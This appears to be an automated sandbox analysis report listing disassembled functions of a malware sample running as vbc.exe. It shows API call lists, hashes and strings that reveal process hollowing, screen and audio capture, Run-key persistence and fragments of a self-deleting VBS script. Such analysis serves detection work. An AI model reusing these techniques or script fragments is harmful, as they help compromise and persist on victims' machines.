Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

EnumSystemLocalesW.KERNEL32(00451EA7,00000001,?,?,?,00452712,lJD,?,?,?,?,?,00444A6C,?,?,?), ref: 00451F87

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
Instruction ID: 7090a925995da140c065d9916092b781359a33e81ca1c933e4536b6f4f09cf03
Opcode Fuzzy Hash: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
Instruction Fuzzy Hash: A7F0203674020597CB04AF75C809B6A7F90EBC272AB06009AEE058B662C7799842C754

Function 0040F8D1 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.0.0 Pro), ref: 0040F8E5

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
Opcode Fuzzy Hash: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1

Function 00434B47 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00034B53,0043487A), ref: 00434B4C

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
Instruction Fuzzy Hash:

Function 00418E76 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 328windowmemoryCOMMON

Download Yara Rule

APIs

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
CreateCompatibleDC.GDI32(00000000), ref: 00418E9D

Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355

CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
DeleteDC.GDI32(00000000), ref: 00418F2A
DeleteDC.GDI32(00000000), ref: 00418F2D
DeleteObject.GDI32(00000000), ref: 00418F30
SelectObject.GDI32(00000000,00000000), ref: 00418F51
DeleteDC.GDI32(00000000), ref: 00418F62
DeleteDC.GDI32(00000000), ref: 00418F65
StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
GetIconInfo.USER32(?,?), ref: 00418FBD
DeleteObject.GDI32(?), ref: 00418FEC
DeleteObject.GDI32(?), ref: 00418FF9
DrawIcon.USER32(00000000,?,?,?), ref: 00419006
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
DeleteDC.GDI32(?), ref: 0041917C
DeleteDC.GDI32(00000000), ref: 0041917F
DeleteObject.GDI32(00000000), ref: 00419182
GlobalFree.KERNEL32(?), ref: 0041918D
DeleteObject.GDI32(00000000), ref: 00419241
GlobalFree.KERNEL32(?), ref: 00419248
DeleteDC.GDI32(?), ref: 00419258
DeleteDC.GDI32(00000000), ref: 00419263

Strings

DISPLAY, xrefs: 00418E89

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
String ID: DISPLAY
API String ID: 479521175-865373369
Opcode ID: eeea48b2f12328c67a7764adb0283258d44bef4919e0b7e4c041a6272c1fd371
Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
Opcode Fuzzy Hash: eeea48b2f12328c67a7764adb0283258d44bef4919e0b7e4c041a6272c1fd371
Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A

Function 004180EF Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
GetProcAddress.KERNEL32(00000000), ref: 00418139
GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
GetProcAddress.KERNEL32(00000000), ref: 0041814D
GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
GetProcAddress.KERNEL32(00000000), ref: 00418161
GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
GetProcAddress.KERNEL32(00000000), ref: 00418175
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
GetThreadContext.KERNEL32(?,00000000), ref: 00418245
ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
TerminateProcess.KERNEL32(?,00000000), ref: 00418301
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
SetThreadContext.KERNEL32(?,00000000), ref: 00418428
ResumeThread.KERNEL32(?), ref: 00418435
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
GetCurrentProcess.KERNEL32(?), ref: 00418457
TerminateProcess.KERNEL32(?,00000000), ref: 00418472
GetLastError.KERNEL32 ref: 0041847A

Strings

ZwMapViewOfSection, xrefs: 0041813B
ZwClose, xrefs: 00418163
ZwCreateSection, xrefs: 0041811C
ZwUnmapViewOfSection, xrefs: 0041814F
ntdll, xrefs: 00418121, 00418140, 00418154, 00418168

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
API String ID: 4188446516-3035715614
Opcode ID: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
Opcode Fuzzy Hash: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A

Function 0040D420 Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 282registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579

Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5

Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430

ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
ExitProcess.KERNEL32 ref: 0040D7D0

Strings

\update.vbs, xrefs: 0040D57B
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040D471
fso.DeleteFile ", xrefs: 0040D63A
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040D773
""", 0, xrefs: 0040D6E7
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040D5AA
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040D4C2
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040D701
open, xrefs: 0040D7BE
Temp, xrefs: 0040D580
"), xrefs: 0040D5D5
On Error Resume Next, xrefs: 0040D5B9
while fso.FileExists(", xrefs: 0040D5EC
8SG, xrefs: 0040D4CF
fso.DeleteFolder ", xrefs: 0040D6AB
0qF, xrefs: 0040D737, 0040D778, 0040D661, 0040D68E
0qF, xrefs: 0040D78C, 0040D797
dMG, xrefs: 0040D45B
wend, xrefs: 0040D689
exepath, xrefs: 0040D4F7

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
API String ID: 1861856835-332907002
Opcode ID: 4ed5f5d5e7ff342ec2a336c57b1c01b382e2bcaa191396cb8c86ed758bd95090
Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
Opcode Fuzzy Hash: 4ed5f5d5e7ff342ec2a336c57b1c01b382e2bcaa191396cb8c86ed758bd95090
Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E

Function 0040D096 Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 260registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7

Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5

Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F

ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
ExitProcess.KERNEL32 ref: 0040D419

Strings

8SG, xrefs: 0040D15E
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040D0E7
fso.DeleteFile ", xrefs: 0040D315
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040D3C1
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040D285
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040D138
pth_unenc, xrefs: 0040D09C
open, xrefs: 0040D40C
Temp, xrefs: 0040D246
.vbs, xrefs: 0040D201
"), xrefs: 0040D2B1
On Error Resume Next, xrefs: 0040D294
while fso.FileExists(", xrefs: 0040D2C8
dMG, xrefs: 0040D0D1
fso.DeleteFolder ", xrefs: 0040D38A
hpF, xrefs: 0040D38F
wend, xrefs: 0040D364
exepath, xrefs: 0040D181

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
API String ID: 3797177996-2557013105
Opcode ID: d286f588f5818cca07a6e4c27455efb45431ebdc6a01d8eb82299511fc22b521
Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
Opcode Fuzzy Hash: d286f588f5818cca07a6e4c27455efb45431ebdc6a01d8eb82299511fc22b521
Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E

Function 00412475 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 190synchronizationsleepfileCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
ExitProcess.KERNEL32(00000000), ref: 004124A0
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
CloseHandle.KERNEL32(00000000), ref: 0041253B
GetCurrentProcessId.KERNEL32 ref: 00412541
PathFileExistsW.SHLWAPI(?), ref: 00412572
GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
lstrcatW.KERNEL32(?,.exe), ref: 00412601

Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430

ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
Sleep.KERNEL32(000001F4), ref: 00412682
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
CloseHandle.KERNEL32(00000000), ref: 004126A9
GetCurrentProcessId.KERNEL32 ref: 004126AF

Strings

WDH, xrefs: 00412548, 004126B6
8SG, xrefs: 004124A6
.exe, xrefs: 004125F5
temp_, xrefs: 004125E3
open, xrefs: 0041263B
exepath, xrefs: 004124CC

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
String ID: .exe$8SG$WDH$exepath$open$temp_
API String ID: 2649220323-436679193
Opcode ID: 68a6d1683c491aa5f69a5158323edd29138381c8b32ecc661663b13424b24b94
Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
Opcode Fuzzy Hash: 68a6d1683c491aa5f69a5158323edd29138381c8b32ecc661663b13424b24b94
Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D

Function 0041B047 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B18E
mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
SetEvent.KERNEL32 ref: 0041B219
WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
CloseHandle.KERNEL32 ref: 0041B23A
mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266

Strings

status audio mode, xrefs: 0041B1F7
stopped, xrefs: 0041B202
stop audio, xrefs: 0041B257
alias audio, xrefs: 0041B0B8
play audio, xrefs: 0041B14B
" type , xrefs: 0041B0D5
open ", xrefs: 0041B0D0
close audio, xrefs: 0041B261
NG, xrefs: 0041B109, 0041B08B
resume audio, xrefs: 0041B1E2
pause audio, xrefs: 0041B1CA

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
API String ID: 738084811-2094122233
Opcode ID: a32571104eb0df3ab7bb69bc80b77b3340521799c31937e3b9a7319bb649b0aa
Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
Opcode Fuzzy Hash: a32571104eb0df3ab7bb69bc80b77b3340521799c31937e3b9a7319bb649b0aa
Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E

Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7

Strings

fmt , xrefs: 00401B2D
data, xrefs: 00401BB1
RIFF, xrefs: 00401AFD
WAVE, xrefs: 00401B1D

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: File$Write$Create
String ID: RIFF$WAVE$data$fmt
API String ID: 1602526932-4212202414
Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3

Function 00407270 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe,00000001,0040764D,C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
GetProcAddress.KERNEL32(00000000), ref: 0040728D
GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
GetProcAddress.KERNEL32(00000000), ref: 004072A5
GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
GetProcAddress.KERNEL32(00000000), ref: 004072B9
GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
GetProcAddress.KERNEL32(00000000), ref: 004072CD
GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
GetProcAddress.KERNEL32(00000000), ref: 004072E1
GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
GetProcAddress.KERNEL32(00000000), ref: 004072F5

Strings

RtlReleasePebLock, xrefs: 004072D8
ntdll.dll, xrefs: 00407278, 00407283, 004072A1, 004072B5, 004072C9, 004072DD, 004072F1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe, xrefs: 00407271
RtlInitUnicodeString, xrefs: 0040727E
NtFreeVirtualMemory, xrefs: 004072B0
NtAllocateVirtualMemory, xrefs: 0040729C
LdrEnumerateLoadedModules, xrefs: 004072EC
RtlAcquirePebLock, xrefs: 004072C4

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
API String ID: 1646373207-3995267147
Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D

Function 0040CDF9 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 203fileCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0040CE07
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CED0
_wcslen.LIBCMT ref: 0040CEE6
CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe,00000000,00000000), ref: 0040CF84
SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
_wcslen.LIBCMT ref: 0040CFC6
SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D02D
ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
ExitProcess.KERNEL32 ref: 0040D062

Strings

del, xrefs: 0040CFF5
6, xrefs: 0040CEDA
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe, xrefs: 0040CE91, 0040CE96, 0040CEC9, 0040CF7E, 0040CF83, 0040CF8A, 0040CFEB
open, xrefs: 0040D044

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe$del$open
API String ID: 1579085052-2133383635
Opcode ID: 796ba6405bd8a90df0372751ab310b3abe3628a0db2faaf63edc81667cb98c6a
Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
Opcode Fuzzy Hash: 796ba6405bd8a90df0372751ab310b3abe3628a0db2faaf63edc81667cb98c6a
Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E

Function 0041C01B Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 0041C036
_memcmp.LIBVCRUNTIME ref: 0041C04E
lstrlenW.KERNEL32(?), ref: 0041C067
FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C0A2
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
lstrcmpW.KERNEL32(?,?), ref: 0041C114
FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
_wcslen.LIBCMT ref: 0041C13B
FindVolumeClose.KERNEL32(?), ref: 0041C15B
GetLastError.KERNEL32 ref: 0041C173
GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
lstrcatW.KERNEL32(?,?), ref: 0041C1B9
lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
GetLastError.KERNEL32 ref: 0041C1D0

Strings

?, xrefs: 0041C0CD

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
String ID: ?
API String ID: 3941738427-1684325040
Opcode ID: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
Opcode Fuzzy Hash: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA

Function 00414D86 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 109libraryloaderCOMMON

Download Yara Rule

